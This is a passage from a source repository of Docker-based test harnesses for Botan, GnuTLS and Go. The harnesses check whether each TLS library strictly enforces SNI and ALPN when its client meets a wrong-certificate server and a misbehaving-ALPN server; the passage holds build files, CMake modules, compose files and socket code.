THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 15 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 16 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 17 | ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE 18 | LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 19 | CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 20 | SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 21 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 22 | CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 23 | ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 24 | POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /evaluation-libraries/botan/README.md: -------------------------------------------------------------------------------- 1 | # botan example with strict sni and strict alpn 2 | 3 | Tested with botan 2.17.3 4 | 5 | needs tls-baseimage already in docker 6 | 7 | Based on https://github.com/randombit/botan tls_client.cpp and tls_server.cpp 8 | 9 | ```bash 10 | ./run.sh 11 | ``` 12 | 13 | 14 | -------------------------------------------------------------------------------- /evaluation-libraries/botan/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-botan -------------------------------------------------------------------------------- /evaluation-libraries/botan/client/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-botan-client VERSION 0.1.0) 3 | 4 | find_package(Botan2 REQUIRED) 5 | include_directories(SYSTEM ${BOTAN2_INCLUDE_DIR}) 6 | 7 | add_executable(client client.cpp) 8 | target_link_libraries(client pthread ${BOTAN2_LIBRARIES}) 9 | target_compile_options(client PRIVATE -Wall -Wextra) -------------------------------------------------------------------------------- /evaluation-libraries/botan/cmake/FindBotan2.cmake: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2018-2020 Ribose Inc. 2 | # All rights reserved. 3 | # 4 | # Redistribution and use in source and binary forms, with or without 5 | # modification, are permitted provided that the following conditions 6 | # are met: 7 | # 1. Redistributions of source code must retain the above copyright 8 | # notice, this list of conditions and the following disclaimer. 9 | # 2. Redistributions in binary form must reproduce the above copyright 10 | # notice, this list of conditions and the following disclaimer in the 11 | # documentation and/or other materials provided with the distribution. 12 | # 13 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 14 | # ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 15 | # TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 16 | # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS 17 | # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 18 | # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 19 | # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 20 | # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 21 | # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 22 | # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 23 | # POSSIBILITY OF SUCH DAMAGE. 24 | 25 | #.rst: 26 | # FindBotan2 27 | # ----------- 28 | # 29 | # Find the botan-2 library. 30 | # 31 | # IMPORTED Targets 32 | # ^^^^^^^^^^^^^^^^ 33 | # 34 | # This module defines :prop_tgt:`IMPORTED` targets: 35 | # 36 | # ``Botan2::Botan2`` 37 | # The botan-2 library, if found. 38 | # 39 | # Result variables 40 | # ^^^^^^^^^^^^^^^^ 41 | # 42 | # This module defines the following variables: 43 | # 44 | # :: 45 | # 46 | # BOTAN2_FOUND - true if the headers and library were found 47 | # BOTAN2_INCLUDE_DIRS - where to find headers 48 | # BOTAN2_LIBRARIES - list of libraries to link 49 | # BOTAN2_VERSION - library version that was found, if any 50 | 51 | # use pkg-config to get the directories and then use these values 52 | # in the find_path() and find_library() calls 53 | find_package(PkgConfig QUIET) 54 | pkg_check_modules(PC_BOTAN2 QUIET botan-2) 55 | 56 | # find the headers 57 | find_path(BOTAN2_INCLUDE_DIR 58 | NAMES botan/version.h 59 | HINTS 60 | ${PC_BOTAN2_INCLUDEDIR} 61 | ${PC_BOTAN2_INCLUDE_DIRS} 62 | PATH_SUFFIXES botan-2 63 | ) 64 | 65 | # find the library 66 | if(MSVC) 67 | find_library(BOTAN2_LIBRARY 68 | NAMES botan 69 | HINTS 70 | ${PC_BOTAN2_LIBDIR} 71 | ${PC_BOTAN2_LIBRARY_DIRS} 72 | ) 73 | else() 74 | find_library(BOTAN2_LIBRARY 75 | NAMES botan-2 libbotan-2 76 | HINTS 77 | ${PC_BOTAN2_LIBDIR} 78 | ${PC_BOTAN2_LIBRARY_DIRS} 79 | ) 80 | endif() 81 | 82 | # determine the version 83 | if(PC_BOTAN2_VERSION) 84 | set(BOTAN2_VERSION ${PC_BOTAN2_VERSION}) 85 | elseif(BOTAN2_INCLUDE_DIR AND EXISTS "${BOTAN2_INCLUDE_DIR}/botan/build.h") 86 | file(STRINGS "${BOTAN2_INCLUDE_DIR}/botan/build.h" botan2_version_str 87 | REGEX "^#define[\t ]+(BOTAN_VERSION_[A-Z]+)[\t ]+[0-9]+") 88 | 89 | string(REGEX REPLACE ".*#define[\t ]+BOTAN_VERSION_MAJOR[\t ]+([0-9]+).*" 90 | "\\1" _botan2_version_major "${botan2_version_str}") 91 | string(REGEX REPLACE ".*#define[\t ]+BOTAN_VERSION_MINOR[\t ]+([0-9]+).*" 92 | "\\1" _botan2_version_minor "${botan2_version_str}") 93 | string(REGEX REPLACE ".*#define[\t ]+BOTAN_VERSION_PATCH[\t ]+([0-9]+).*" 94 | "\\1" _botan2_version_patch "${botan2_version_str}") 95 | set(BOTAN2_VERSION "${_botan2_version_major}.${_botan2_version_minor}.${_botan2_version_patch}" 96 | CACHE INTERNAL "The version of Botan which was detected") 97 | endif() 98 | 99 | include(FindPackageHandleStandardArgs) 100 | find_package_handle_standard_args(Botan2 101 | REQUIRED_VARS BOTAN2_LIBRARY BOTAN2_INCLUDE_DIR 102 | VERSION_VAR BOTAN2_VERSION 103 | ) 104 | 105 | if (BOTAN2_FOUND) 106 | set(BOTAN2_INCLUDE_DIRS ${BOTAN2_INCLUDE_DIR} ${PC_BOTAN2_INCLUDE_DIRS}) 107 | set(BOTAN2_LIBRARIES ${BOTAN2_LIBRARY}) 108 | endif() 109 | 110 | if (BOTAN2_FOUND AND NOT TARGET Botan2::Botan2) 111 | # create the new library target 112 | add_library(Botan2::Botan2 UNKNOWN IMPORTED) 113 | # set the required include dirs for the target 114 | if (BOTAN2_INCLUDE_DIRS) 115 | set_target_properties(Botan2::Botan2 116 | PROPERTIES 117 | INTERFACE_INCLUDE_DIRECTORIES "${BOTAN2_INCLUDE_DIRS}" 118 | ) 119 | endif() 120 | # set the required libraries for the target 121 | if (EXISTS "${BOTAN2_LIBRARY}") 122 | set_target_properties(Botan2::Botan2 123 | PROPERTIES 124 | IMPORTED_LINK_INTERFACE_LANGUAGES "C" 125 | IMPORTED_LOCATION "${BOTAN2_LIBRARY}" 126 | ) 127 | endif() 128 | endif() 129 | 130 | mark_as_advanced(BOTAN2_INCLUDE_DIR BOTAN2_LIBRARY) -------------------------------------------------------------------------------- /evaluation-libraries/botan/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | botan-server: 8 | image: tls-botan 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: [ "/openssl-server", "-k", "/etc/ssl/cert-data/wrong-cn.com.key", "-c" , "/etc/ssl/cert-data/wrong-cn.com-chain.crt"] 12 | openssl-malicious-alpn: 13 | image: tls-openssl 14 | command: [ "/openssl-server", "-m"] 15 | botan-client: 16 | image: tls-botan 17 | command: [ "/client.sh", "/client", "botan-server", "openssl-server-wrong-cn", "openssl-malicious-alpn" ,"1"] 18 | depends_on: 19 | - botan-server 20 | - openssl-server-wrong-cn 21 | - openssl-malicious-alpn -------------------------------------------------------------------------------- /evaluation-libraries/botan/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --abort-on-container-exit --exit-code-from botan-client --remove-orphans -------------------------------------------------------------------------------- /evaluation-libraries/botan/server/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-botan-server VERSION 0.1.0) 3 | 4 | find_package(Botan2 REQUIRED) 5 | include_directories(SYSTEM ${BOTAN2_INCLUDE_DIR}) 6 | 7 | add_executable(server server.cpp) 8 | target_link_libraries(server pthread ${BOTAN2_LIBRARIES}) 9 | target_compile_options(server PRIVATE -Wall -Wextra) -------------------------------------------------------------------------------- /evaluation-libraries/botan/server/server.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | #include 27 | #include 28 | 29 | typedef int socket_type; 30 | typedef size_t sendrecv_len_type; 31 | 32 | socket_type make_server_socket(uint16_t port) { 33 | socket_type fd = ::socket(PF_INET, SOCK_STREAM, 0); 34 | if (fd == -1) { 35 | std::cerr << "Unable to acquire socket" << std::endl; 36 | } 37 | 38 | sockaddr_in socket_info; 39 | Botan::clear_mem(&socket_info, 1); 40 | socket_info.sin_family = AF_INET; 41 | socket_info.sin_port = htons(port); 42 | 43 | // FIXME: support limiting listeners 44 | socket_info.sin_addr.s_addr = INADDR_ANY; 45 | 46 | if (::bind(fd, reinterpret_cast(&socket_info), sizeof(struct sockaddr)) != 0) { 47 | ::close(fd); 48 | std::cerr << "server bind failed" << std::endl; 49 | } 50 | 51 | if (::listen(fd, 100) != 0) { 52 | ::close(fd); 53 | std::cerr << "listen failed" << std::endl; 54 | } 55 | return fd; 56 | } 57 | 58 | /* class Basic_TLS_Policy final : public Botan::TLS::Policy 59 | { 60 | public: 61 | bool require_cert_revocation_info() const override 62 | { 63 | return false; 64 | } 65 | std::vector allowed_ciphers() const override 66 | { 67 | return {"ChaCha20Poly1305", "AES-256/GCM", "AES-128/GCM"}; 68 | } 69 | std::vector allowed_signature_hashes() const override 70 | { 71 | return {"SHA-512", "SHA-384"}; 72 | } 73 | std::vector allowed_macs() const override 74 | { 75 | return {"AEAD"}; 76 | } 77 | std::vector allowed_key_exchange_methods() const override 78 | { 79 | return {"CECPQ1", "ECDH"}; 80 | } 81 | bool allow_tls10() const override { return false; } 82 | bool allow_tls11() const override { return false; } 83 | bool allow_tls12() const override { return true; } 84 | }; */ 85 | -------------------------------------------------------------------------------- /evaluation-libraries/build-everything.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | for library in baseimage openssl bearssl botan java gnutls golang mbedtls wolfssl rustls; do 3 | (cd "$library" 4 | ./build.sh); 5 | done 6 | -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-gnutls VERSION 0.1.0) 3 | 4 | 5 | set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} ${CMAKE_CURRENT_SOURCE_DIR}/cmake) 6 | include(CMakeToolsHelpers OPTIONAL) 7 | include(FeatureSummary) 8 | 9 | include(CheckCCompilerFlag) 10 | include(CheckCXXCompilerFlag) 11 | include(CheckCXXSourceCompiles) 12 | 13 | 14 | 15 | add_subdirectory(client) 16 | add_subdirectory(server) 17 | -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/Dockerfile: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-baseimage as tls-gnutls 3 | ARG VERSION=3.7.2 4 | # RUN git clone --depth=1 -b ${VERSION} https://gitlab.com/gnutls/gnutls.git 5 | # RUN apk add guile-dev 6 | # ENV PKG_CONFIG_PATH=/build/lib/pkgconfig/ 7 | # # RUN apk add flex gmp-dev libunistring-dev libffi-dev gc-dev 8 | # # RUN git clone https://github.com/cky/guile.git 9 | # # WORKDIR /src/guile 10 | # # RUN ./autogen.sh 11 | # # RUN ./configure 12 | # # RUN make 13 | 14 | # RUN wget https://ftp.gnu.org/gnu/autogen/rel5.18.12/autogen-5.18.12.tar.gz 15 | # RUN tar -xzf autogen-5.18.12.tar.gz 16 | # WORKDIR /src/autogen-5.18.12/ 17 | # RUN ./configure 18 | # RUN make && make install 19 | 20 | # WORKDIR /src/gnutls 21 | # RUN git submodule update --init --no-fetch 22 | # RUN ./bootstrap 23 | # RUN ./configure --with-included-libtasn1 --with-included-unistring --disable-maintainer-mode --disable-doc --disable-full-test-suite --disable-cxx --disable-padlock --without-p11-kit --without-tpm 24 | # RUN make 25 | 26 | RUN apk add --no-cache gnutls-dev 27 | 28 | ADD cmake /build/cmake 29 | ADD server /build/server 30 | ADD client /build/client 31 | ADD CMakeLists.txt /build/CMakeLists.txt 32 | WORKDIR /build 33 | RUN cmake . .. && make 34 | RUN mv /build/server/server / 35 | RUN mv /build/client/client / 36 | COPY --from=tls-openssl /openssl-client /openssl-client 37 | WORKDIR / 38 | CMD ["/server"] 39 | -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/LICENSE: -------------------------------------------------------------------------------- 1 | LICENSING 2 | ========= 3 | 4 | Since GnuTLS version 3.1.10, the core library is released under 5 | the GNU Lesser General Public License (LGPL) version 2.1 or later 6 | (see doc/COPYING.LESSER for the license terms). 7 | 8 | The GNU LGPL applies to the main GnuTLS library, while the 9 | included applications as well as gnutls-openssl 10 | library are under the GNU GPL version 3. The gnutls library is 11 | located in the lib/ and libdane/ directories, while the applications 12 | in src/ and, the gnutls-openssl library is at extra/. 13 | 14 | The documentation in doc/ is under the GNU FDL license 1.3. 15 | 16 | 17 | Note, however, that the nettle and the gmp libraries which are 18 | GnuTLS dependencies, they are distributed under a LGPLv3+ or GPLv2+ dual 19 | license. As such binaries linking to them need to adhere to either LGPLv3+ 20 | or the GPLv2+ license. 21 | 22 | For any copyright year range specified as YYYY-ZZZZ in this package 23 | note that the range specifies every single year in that closed interval. -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-gnutls 2 | -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/client/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-gnutls-client VERSION 0.1.0) 3 | 4 | find_package(GnuTLS REQUIRED) 5 | include_directories(SYSTEM ${GNUTLS_INCLUDE_DIR}) 6 | 7 | add_executable(client client.c) 8 | target_link_libraries(client ${GNUTLS_LIBRARIES}) 9 | target_compile_options(client PRIVATE -Wall -Wextra) -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/client/examples.h: -------------------------------------------------------------------------------- 1 | /* This example code is placed in the public domain. */ 2 | // gnutls/gnutls/doc/examples 3 | 4 | #ifndef EXAMPLES_H 5 | #define EXAMPLES_H 6 | 7 | void check_alert(gnutls_session_t session, int ret); 8 | 9 | int write_pkcs12(const gnutls_datum_t *cert, 10 | const gnutls_datum_t *pkcs8_key, const char *password); 11 | 12 | void verify_certificate(gnutls_session_t session, const char *hostname); 13 | 14 | int print_info(gnutls_session_t session); 15 | 16 | void print_x509_certificate_info(gnutls_session_t session); 17 | 18 | int _ssh_verify_certificate_callback(gnutls_session_t session); 19 | 20 | void verify_certificate_chain(const char *hostname, 21 | const gnutls_datum_t *cert_chain, 22 | int cert_chain_length); 23 | 24 | int verify_certificate_callback(gnutls_session_t session); 25 | 26 | #endif /* EXAMPLES_H */ 27 | -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/client/tcp.c: -------------------------------------------------------------------------------- 1 | /* This example code is placed in the public domain. */ 2 | // gnutls/gnutls/doc/examples 3 | 4 | #ifdef HAVE_CONFIG_H 5 | #include 6 | #endif 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | /* tcp.c */ 19 | void tcp_close(int sd); 20 | 21 | /* Connects to the peer and returns a socket 22 | * descriptor. 23 | */ 24 | int tcp_connect(const char *hostname, const char *port) { 25 | int sockfd, portno; 26 | struct sockaddr_in serv_addr; 27 | struct hostent *server; 28 | portno = atoi(port); 29 | sockfd = socket(AF_INET, SOCK_STREAM, 0); 30 | if (sockfd < 0) 31 | printf("ERROR opening socket"); 32 | server = gethostbyname(hostname); 33 | if (server == NULL) { 34 | fprintf(stderr, "ERROR, no such host\n"); 35 | exit(0); 36 | } 37 | bzero((char *)&serv_addr, sizeof(serv_addr)); 38 | serv_addr.sin_family = AF_INET; 39 | bcopy((char *)server->h_addr, 40 | (char *)&serv_addr.sin_addr.s_addr, 41 | server->h_length); 42 | serv_addr.sin_port = htons(portno); 43 | int err = connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)); 44 | if (err < 0) { 45 | fprintf(stderr, "Connect error\n"); 46 | exit(1); 47 | } 48 | return sockfd; 49 | /*int err, sd; 50 | struct sockaddr_in sa; 51 | 52 | struct hostent *host = gethostbyname(hostname); 53 | if (!host) 54 | { 55 | printf("unable to resolve : %s\n", hostname); 56 | return false; 57 | } 58 | 59 | //printf("%s", host->h_addr_list[0]); 60 | 61 | sd = socket(AF_INET, SOCK_STREAM, 0); 62 | 63 | memset(&sa, '\0', sizeof(sa)); 64 | sa.sin_family = AF_INET; 65 | sa.sin_port = htons(atoi(port)); 66 | inet_pton(AF_INET, host->h_addr_list[0], &sa.sin_addr); 67 | 68 | err = connect(sd, (struct sockaddr *) &sa, sizeof(sa)); 69 | if (err < 0) { 70 | fprintf(stderr, "Connect error\n"); 71 | exit(1); 72 | } 73 | 74 | return sd;*/ 75 | } 76 | 77 | /* closes the given socket descriptor. 78 | */ 79 | extern void tcp_close(int sd) { 80 | shutdown(sd, SHUT_RDWR); /* no more receptions */ 81 | close(sd); 82 | } 83 | -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/cmake/FindGnuTLS.cmake: -------------------------------------------------------------------------------- 1 | # Distributed under the OSI-approved BSD 3-Clause License. See accompanying 2 | # file Copyright.txt or https://cmake.org/licensing for details. 3 | 4 | #[=======================================================================[.rst: 5 | FindGnuTLS 6 | ---------- 7 | 8 | Find the GNU Transport Layer Security library (gnutls) 9 | 10 | IMPORTED Targets 11 | ^^^^^^^^^^^^^^^^ 12 | 13 | .. versionadded:: 3.16 14 | 15 | This module defines :prop_tgt:`IMPORTED` target ``GnuTLS::GnuTLS``, if 16 | gnutls has been found. 17 | 18 | Result Variables 19 | ^^^^^^^^^^^^^^^^ 20 | 21 | ``GNUTLS_FOUND`` 22 | System has gnutls 23 | ``GNUTLS_INCLUDE_DIR`` 24 | The gnutls include directory 25 | ``GNUTLS_LIBRARIES`` 26 | The libraries needed to use gnutls 27 | ``GNUTLS_DEFINITIONS`` 28 | Compiler switches required for using gnutls 29 | ``GNUTLS_VERSION`` 30 | version of gnutls. 31 | #]=======================================================================] 32 | 33 | # Note that this doesn't try to find the gnutls-extra package. 34 | 35 | 36 | if (GNUTLS_INCLUDE_DIR AND GNUTLS_LIBRARY) 37 | # in cache already 38 | set(gnutls_FIND_QUIETLY TRUE) 39 | endif () 40 | 41 | if (NOT WIN32) 42 | # try using pkg-config to get the directories and then use these values 43 | # in the find_path() and find_library() calls 44 | # also fills in GNUTLS_DEFINITIONS, although that isn't normally useful 45 | find_package(PkgConfig QUIET) 46 | PKG_CHECK_MODULES(PC_GNUTLS QUIET gnutls) 47 | set(GNUTLS_DEFINITIONS ${PC_GNUTLS_CFLAGS_OTHER}) 48 | set(GNUTLS_VERSION ${PC_GNUTLS_VERSION}) 49 | # keep for backward compatibility 50 | set(GNUTLS_VERSION_STRING ${PC_GNUTLS_VERSION}) 51 | endif () 52 | 53 | find_path(GNUTLS_INCLUDE_DIR gnutls/gnutls.h 54 | HINTS 55 | ${PC_GNUTLS_INCLUDEDIR} 56 | ${PC_GNUTLS_INCLUDE_DIRS} 57 | ) 58 | 59 | find_library(GNUTLS_LIBRARY NAMES gnutls libgnutls 60 | HINTS 61 | ${PC_GNUTLS_LIBDIR} 62 | ${PC_GNUTLS_LIBRARY_DIRS} 63 | ) 64 | 65 | mark_as_advanced(GNUTLS_INCLUDE_DIR GNUTLS_LIBRARY) 66 | 67 | include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake) 68 | FIND_PACKAGE_HANDLE_STANDARD_ARGS(GnuTLS 69 | REQUIRED_VARS GNUTLS_LIBRARY GNUTLS_INCLUDE_DIR 70 | VERSION_VAR GNUTLS_VERSION_STRING) 71 | 72 | if(GNUTLS_FOUND) 73 | set(GNUTLS_LIBRARIES ${GNUTLS_LIBRARY}) 74 | set(GNUTLS_INCLUDE_DIRS ${GNUTLS_INCLUDE_DIR}) 75 | 76 | if(NOT TARGET GnuTLS::GnuTLS) 77 | add_library(GnuTLS::GnuTLS UNKNOWN IMPORTED) 78 | set_target_properties(GnuTLS::GnuTLS PROPERTIES 79 | INTERFACE_INCLUDE_DIRECTORIES "${GNUTLS_INCLUDE_DIRS}" 80 | INTERFACE_COMPILE_DEFINITIONS "${GNUTLS_DEFINITIONS}" 81 | IMPORTED_LINK_INTERFACE_LANGUAGES "C" 82 | IMPORTED_LOCATION "${GNUTLS_LIBRARIES}") 83 | endif() 84 | endif() -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/cmake/FindPackageMessage.cmake: -------------------------------------------------------------------------------- 1 | # Distributed under the OSI-approved BSD 3-Clause License. See accompanying 2 | # file Copyright.txt or https://cmake.org/licensing for details. 3 | 4 | #[=======================================================================[.rst: 5 | FindPackageMessage 6 | ------------------ 7 | 8 | .. code-block:: cmake 9 | 10 | find_package_message( "message for user" "find result details") 11 | 12 | This function is intended to be used in FindXXX.cmake modules files. 13 | It will print a message once for each unique find result. This is 14 | useful for telling the user where a package was found. The first 15 | argument specifies the name (XXX) of the package. The second argument 16 | specifies the message to display. The third argument lists details 17 | about the find result so that if they change the message will be 18 | displayed again. The macro also obeys the QUIET argument to the 19 | find_package command. 20 | 21 | Example: 22 | 23 | .. code-block:: cmake 24 | 25 | if(X11_FOUND) 26 | find_package_message(X11 "Found X11: ${X11_X11_LIB}" 27 | "[${X11_X11_LIB}][${X11_INCLUDE_DIR}]") 28 | else() 29 | ... 30 | endif() 31 | #]=======================================================================] 32 | 33 | function(find_package_message pkg msg details) 34 | # Avoid printing a message repeatedly for the same find result. 35 | if(NOT ${pkg}_FIND_QUIETLY) 36 | string(REPLACE "\n" "" details "${details}") 37 | set(DETAILS_VAR FIND_PACKAGE_MESSAGE_DETAILS_${pkg}) 38 | if(NOT "${details}" STREQUAL "${${DETAILS_VAR}}") 39 | # The message has not yet been printed. 40 | message(STATUS "${msg}") 41 | 42 | # Save the find details in the cache to avoid printing the same 43 | # message again. 44 | set("${DETAILS_VAR}" "${details}" 45 | CACHE INTERNAL "Details about finding ${pkg}") 46 | endif() 47 | endif() 48 | endfunction() -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | gnutls-server: 8 | image: tls-gnutls 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: [ "/openssl-server", "-k", "/etc/ssl/cert-data/wrong-cn.com.key", "-c" , "/etc/ssl/cert-data/wrong-cn.com-chain.crt"] 12 | openssl-malicious-alpn: 13 | image: tls-openssl 14 | command: [ "/openssl-server", "-m"] 15 | gnutls-client: 16 | image: tls-gnutls 17 | command: [ "./client.sh", "/client", "gnutls-server", "openssl-server-wrong-cn", "openssl-malicious-alpn" ,"1"] 18 | depends_on: 19 | - gnutls-server 20 | - openssl-server-wrong-cn 21 | - openssl-malicious-alpn -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/readme.md: -------------------------------------------------------------------------------- 1 | # gnuttls example with strict sni and strict alpn 2 | 3 | Tested with GnuTLS 3.7.1 4 | 5 | needs tls-baseimage already in docker 6 | 7 | based on https://gitlab.com/gnutls/gnutls/-/tree/3.7.1/doc/examples 8 | 9 | ```bash 10 | ./run.sh 11 | ``` -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --abort-on-container-exit --exit-code-from gnutls-client --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/server/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-gnutls-server VERSION 0.1.0) 3 | 4 | find_package(GnuTLS REQUIRED) 5 | include_directories(SYSTEM ${GNUTLS_INCLUDE_DIR}) 6 | 7 | add_executable(server server.c) 8 | target_link_libraries(server ${GNUTLS_LIBRARIES}) 9 | target_compile_options(server PRIVATE -Wall -Wextra) -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/server/server.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #define CHECK(x) assert((x) >= 0) 14 | #define LOOP_CHECK(rval, cmd) \ 15 | do { \ 16 | rval = cmd; \ 17 | } while (rval == GNUTLS_E_AGAIN || rval == GNUTLS_E_INTERRUPTED) 18 | 19 | #define MAX_BUF 1024 20 | 21 | int create_socket(u_int16_t port) { 22 | int listen_sd; 23 | struct sockaddr_in sa_serv; 24 | int optval = 1; 25 | /* Socket operations 26 | */ 27 | listen_sd = socket(AF_INET, SOCK_STREAM, 0); 28 | 29 | memset(&sa_serv, '\0', sizeof(sa_serv)); 30 | sa_serv.sin_family = AF_INET; 31 | sa_serv.sin_addr.s_addr = INADDR_ANY; 32 | sa_serv.sin_port = htons(port); 33 | 34 | setsockopt(listen_sd, SOL_SOCKET, SO_REUSEADDR, (void *)&optval, sizeof(int)); 35 | 36 | bind(listen_sd, (struct sockaddr *)&sa_serv, sizeof(sa_serv)); 37 | 38 | return listen_sd; 39 | 40 | printf("Server ready. Listening to port '%d'.\n\n", port); 41 | } -------------------------------------------------------------------------------- /evaluation-libraries/golang/Dockerfile: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-baseimage 3 | WORKDIR . 4 | ADD server /build/server 5 | ADD client /build/client 6 | WORKDIR /build/server 7 | RUN go build server.go 8 | RUN mv server / 9 | WORKDIR /build/client 10 | RUN go build client.go 11 | RUN mv client / 12 | WORKDIR / 13 | COPY --from=tls-openssl /openssl-client /openssl-client 14 | CMD ["/server"] 15 | -------------------------------------------------------------------------------- /evaluation-libraries/golang/README.md: -------------------------------------------------------------------------------- 1 | # golang tls example with strict sni and strict alpn 2 | 3 | Tested with golang 1.16.7 4 | 5 | Based on https://github.com/denji/golang-tls 6 | 7 | needs tls-baseimage already in docker 8 | 9 | 10 | ```bash 11 | ./run.sh 12 | ``` -------------------------------------------------------------------------------- /evaluation-libraries/golang/build.sh: -------------------------------------------------------------------------------- 1 | docker build -t tls-golang . -------------------------------------------------------------------------------- /evaluation-libraries/golang/client/client.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/tls" 5 | "crypto/x509" 6 | "errors" 7 | "flag" 8 | "io/ioutil" 9 | "log" 10 | "os" 11 | "runtime" 12 | "strings" 13 | ) 14 | 15 | var servername string 16 | var certificate string 17 | var host string = "127.0.0.1" 18 | var port string = "4433" 19 | var alpn = []string{""} 20 | 21 | func main() { 22 | log.SetFlags(log.LstdFlags) 23 | 24 | // Get commandline arguments 25 | flag.StringVar(&servername, "s", "tls-server.com", "servername for SNI") 26 | flag.StringVar(&alpn[0], "a", "http/1.1", "ALPN") 27 | flag.StringVar(&certificate, "c", "/etc/ssl/certs/ca.crt", "certicate") 28 | flag.StringVar(&host, "h", "127.0.0.1", "host") 29 | flag.StringVar(&port, "p", "4433", "port") 30 | flag.Parse() 31 | println("Parameters servername=" + servername + " alpn=" + alpn[0] + " cert=" + certificate + " host=" + host + " port=" + port) 32 | 33 | certs := x509.NewCertPool() 34 | 35 | // Read Certificate 36 | pemData, err := ioutil.ReadFile(certificate) 37 | if err != nil { 38 | log.Println(err) 39 | os.Exit(-1) 40 | } 41 | certs.AppendCertsFromPEM(pemData) 42 | 43 | // Setup TLS config 44 | conf := &tls.Config{ 45 | RootCAs: certs, 46 | NextProtos: alpn, 47 | ServerName: servername, 48 | } 49 | if runtime.Version() < "go1.17" { 50 | println("Strict ALPN not implemented in go version. Overriding VerifyConnection") 51 | conf.VerifyConnection = func(cs tls.ConnectionState) error { 52 | if cs.NegotiatedProtocol == "" { 53 | return errors.New("INVALID ALPN") 54 | } else { 55 | log.Println("ALPN:", cs.NegotiatedProtocol) 56 | return nil 57 | } 58 | } 59 | } 60 | 61 | // Connect to host 62 | conn, err := 